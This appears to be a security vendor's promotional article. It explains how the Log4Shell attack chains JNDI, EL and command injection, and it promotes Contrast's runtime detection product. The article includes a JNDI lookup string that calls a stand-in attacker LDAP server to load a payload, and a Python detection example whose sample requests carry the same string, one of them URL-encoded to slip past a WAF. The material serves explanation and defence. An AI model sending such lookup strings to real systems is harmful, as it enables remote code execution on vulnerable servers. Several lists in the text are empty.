Anatomy of an Attack


In today’s rapidly evolving cyber threat landscape, organizations face increasingly sophisticated attacks targeting their applications. Understanding these threats and the technologies designed to combat them is crucial. This article delves into the mechanics of a common application attack, using the infamous Log4Shell vulnerability as an example, and demonstrates how Application Detection and Response (ADR) technology effectively safeguards against such zero-day threats.


To illustrate the complexity and severity of modern application attacks, let’s examine an attack against the infamous Log4Shell vulnerability (CVE-2021-44228) that sent shockwaves through the cybersecurity world in late 2021. This attack is a prime example of attack chaining, leveraging JNDI Injection, Expression Language (EL) Injection and Command Injection.

Technology note: The CVE program, which catalogs publicly disclosed computer security flaws, is maintained by MITRE. Each CVE entry has a unique identifier, making it easier for IT professionals to share information about vulnerabilities across different security tools and services.

The Log4Shell vulnerability affects Log4j, a ubiquitous Java logging framework. The attack begins when a malicious actor sends a specially crafted request to a vulnerable application. This request contains a Java Naming and Directory Interface (JNDI) lookup string in a format like this:

${jndi:ldap://attacker-controlled-server.com/payload}

Technology note: JNDI (Java Naming and Directory Interface) is a Java API that provides naming and directory functionality to Java applications. It allows Java applications to discover and look up data and objects via a name, which can be exploited in certain vulnerabilities like Log4Shell. In this context, it’s being abused to initiate a connection to a malicious server.

When the vulnerable Log4j version processes this string, it treats the ${jndi:...} portion as a lookup to be resolved rather than as literal text. Resolving it causes the application to perform a JNDI lookup, reaching out to the attacker-controlled Lightweight Directory Access Protocol (LDAP) server specified in the string.

Technology note: Log4j is a popular Java-based logging framework developed by Apache. It’s widely used in Java applications for logging various types of data and events.

The attacker’s LDAP server responds with an EL injection payload. Due to the nature of JNDI and how Log4j processes the response, this payload is treated as an EL expression to be evaluated.

The EL expression typically contains malicious code designed to exploit the EL interpreter. This could include commands to download and execute additional malware, exfiltrate data, or establish a backdoor in the system.

Technology note: Expression Language (EL) is a scripting language that allows access to application data. EL injection occurs when an attacker can manipulate or inject malicious EL expressions, potentially leading to code execution. EL injection vulnerabilities are a recurring theme among zero-day vulnerabilities, either directly or indirectly through chained attacks as in this example.

As the EL interpreter evaluates the injected expression, it executes the malicious code within the context of the vulnerable application. This gives the attacker a foothold into the system, often with the same privileges as the application itself.

What makes the Log4Shell vulnerability particularly severe is the widespread use of the Log4j library and how easy the vulnerability was to exploit. It carries the following concerns:

This anatomy of the Log4Shell attack demonstrates why application layer attacks are so potent and why protection mechanisms like Application Detection and Response (ADR) — explained below in depth — are crucial for detecting and preventing such sophisticated attacks.


With initial access established, attackers can leverage this position to use additional tactics to accomplish other objectives, such as:

Before we dive into the details of ADR, it’s crucial to understand how it addresses a significant gap in many organizations’ security strategies: the lack of robust application-level threat detection.

Many organizations rely on WAFs as their primary defense against application-level threats. However, this approach has several critical limitations:

Technology note: A WAF is a security tool that monitors, filters and blocks HTTP traffic to and from a web application. It operates at the network level and is intended to help protect web applications from various attacks, such as Cross-Site Scripting (XSS) and SQL injection.

Technology note: WAF bypasses are techniques attackers use to render WAF security controls ineffective. These include methods to sneak malicious payloads past the WAF’s signature-based protections, or outright avoidance of the WAF entrypoint to the application. It is important to have a defense-in-depth strategy when it comes to AppSec and not rely on a single control to ensure security of the application layer.

EDR solutions focus on monitoring and protecting individual endpoints within an organization. While crucial for overall security, EDR has its own set of limitations when it comes to application security:

Technology note: EDR is a cybersecurity technology that continuously monitors and responds to threats on endpoint devices such as computers, laptops and mobile devices. EDR solutions collect and analyze data from endpoints to enable security operations teams to detect, investigate and mitigate suspicious activities and potential security breaches. They typically provide real-time visibility, threat detection and automated response capabilities, focusing on endpoint-level activities rather than application-specific behaviors.

ADR technology addresses these limitations by working within the application itself. This approach offers several key advantages:

Technology note: ADR is a security approach that focuses on detecting and responding to threats at the application level. Unlike other AppSec measures that operate at the network level, ADR works within the application itself, providing deeper visibility into application behavior and more accurate threat detection.

Contrast Security employs innovative ADR technology to detect and prevent attacks like Log4Shell at multiple stages. Let’s understand the architecture that makes this possible and examine how it plays out in practice.

Contrast ADR uses agent-based architecture, integrating directly with the application runtime:

Contrast Runtime Security identifies the malicious JNDI lookup attempt by enhancing the JVM’s security settings to prevent abuse of JNDI capabilities.

Contrast Runtime Security identifies EL injection attempts and protects against them by enhancing the JVM’s security settings to prevent abuse of the JVM’s EL processor capabilities.
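The difference between a network-level signature check and a runtime-level check on the lookup itself (the WAF limitation described above and the JNDI hardening just mentioned), as an added example that is not code from the original article or from Contrast: the WAF-style check, the application's decoding step, the allowed-scheme policy and the sample requests are all constructed for this illustration.

```python
import re
from urllib.parse import unquote

# Naive WAF-style signature: looks for the literal lookup prefix in the raw request bytes.
WAF_SIGNATURE = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Log4j lookup syntax is ${prefix:body}; capture the prefix and its body.
LOOKUP = re.compile(r"\$\{([a-zA-Z]+):([^}]*)\}")

# Constructed policy: the runtime guard tolerates only in-process "java:" names;
# remote schemes such as ldap, ldaps, rmi and dns are refused at the point of lookup.
ALLOWED_JNDI_SCHEMES = {"java"}

# Constructed sample request lines (no real hosts or payloads).
SAMPLE_REQUESTS = [
    "GET /search?q=${jndi:ldap://attacker-controlled-server.com/payload} HTTP/1.1",
    "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker-controlled-server.com%2Fpayload%7D HTTP/1.1",
    "GET /search?q=${jndi:java:comp/env/jdbc/appdb} HTTP/1.1",
    "GET /search?q=log4j+upgrade+notes HTTP/1.1",
]


def waf_check(raw_request: str) -> bool:
    """Signature check on the raw request, as a network-level WAF would see it."""
    return bool(WAF_SIGNATURE.search(raw_request))


def application_decodes(raw_request: str) -> str:
    """Constructed stand-in for the application: it URL-decodes the query before logging it."""
    return unquote(raw_request)


def runtime_lookup_guard(log_message: str) -> list:
    """Runtime-level check applied where the logger would resolve lookups, after decoding."""
    findings = []
    for match in LOOKUP.finditer(log_message):
        prefix, body = match.group(1).lower(), match.group(2)
        if prefix != "jndi":
            continue  # other lookups (env, sys, ...) are out of scope for this guard
        scheme = body.split(":", 1)[0].lower()
        findings.append({"scheme": scheme, "target": body,
                         "blocked": scheme not in ALLOWED_JNDI_SCHEMES})
    return findings


def evaluate(raw_request: str) -> dict:
    """Run both checks on one request so the two vantage points can be compared."""
    return {"waf_flagged": waf_check(raw_request),
            "runtime_findings": runtime_lookup_guard(application_decodes(raw_request))}
```

Production WAFs do normalise common encodings; the point of the comparison is that the runtime guard sees the lookup exactly as the logger would resolve it, so encoding or transport does not matter to it.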

In the unlikely event that malicious code is loaded, the Contrast Runtime Security Platform utilizes:

To better understand how Contrast’s ADR technology works in practice, let’s examine a series of events from a replicated Log4Shell attack detection.

Note: All behavioral rules are set to MONITOR mode, not BLOCK mode, for this example to illustrate attacker exploit chaining and the defense-in-depth detection capabilities of Contrast’s ADR. Normally, these rules would be set to BLOCK mode, catching and blocking the initial JNDI exploit, and preventing the subsequent events from occurring in the first place.

This detailed breakdown demonstrates Contrast ADR’s ability to:

This level of insight is critical to prevent attacks and understand new threat patterns.

When Contrast ADR detects a potential Log4Shell exploitation attempt, it triggers a comprehensive response that aligns with the NIST Cybersecurity Framework:

Technology note: SIEM (Security Information and Event Management) is a system that collects and analyzes log data from various sources across an organization’s IT infrastructure. It helps in real-time analysis of security alerts generated by applications and network hardware. Some SIEM examples include Splunk, QRadar and Microsoft Sentinel.

Technology note: XDR (Extended Detection and Response) is a holistic security approach that collects and automatically correlates data across multiple security layers — email, endpoints, servers, cloud workloads and networks. It uses analytics to detect threats and automatically respond to them, providing a more comprehensive and efficient way to detect, investigate and respond to cybersecurity incidents across the entire IT ecosystem.

Throughout this process, the ADR system maintains continuous monitoring, provides real-time updates to security dashboards, and supports compliance reporting by documenting all detection and response actions taken.

The integration of ADR technology with existing Security Information and Event Management (SIEM); security orchestration, automation and response (SOAR); and Extended Detection and Response (XDR) systems creates a powerful synergy that enhances overall security operations. Here’s how ADR can fit into and augment SIEM/SOAR/XDR-driven workflows:

By integrating ADR into the SIEM/SOAR/XDR ecosystem, organizations achieve more comprehensive threat detection, faster incident response and more effective vulnerability management, significantly enhancing their overall security posture.

Implementing Contrast’s ADR technology translates into tangible business benefits:

Note: PCI DSS (Payment Card Industry Data Security Standard) is a set of security standards designed to ensure that all companies that accept, process, store or transmit credit card information maintain a secure environment.

Note: GDPR (General Data Protection Regulation) is a regulation in EU law on data protection and privacy in the European Union and the European Economic Area. It also addresses the transfer of personal data outside the EU and EEA areas.

As cyber threats continue to evolve, network-based application security measures are no longer sufficient to protect critical applications and data. Contrast’s ADR technology offers a robust, intelligent and proactive approach to application security.

By understanding the anatomy of modern attacks and leveraging cutting-edge ADR solutions, organizations can significantly enhance their security posture, minimize risk and stay ahead of emerging threats. As a security decision-maker, investing in ADR technology is not just a security measure — it’s a strategic imperative for safeguarding your organization’s digital assets in today’s threat landscape.

To learn more about how ADR technology can protect your organization and see its capabilities in action, request a demo of Contrast ADR.

By taking these steps, you’ll be well on your way to strengthening your application security and staying ahead of evolving cyber threats.

Note: This article is authored by Jonathan Harper, Principal Solutions Engineer at Contrast Security, with over five years of experience in application security. Jonathan has supported large enterprises and previously held roles at Threat Stack, Veracode, and Micron Technology.
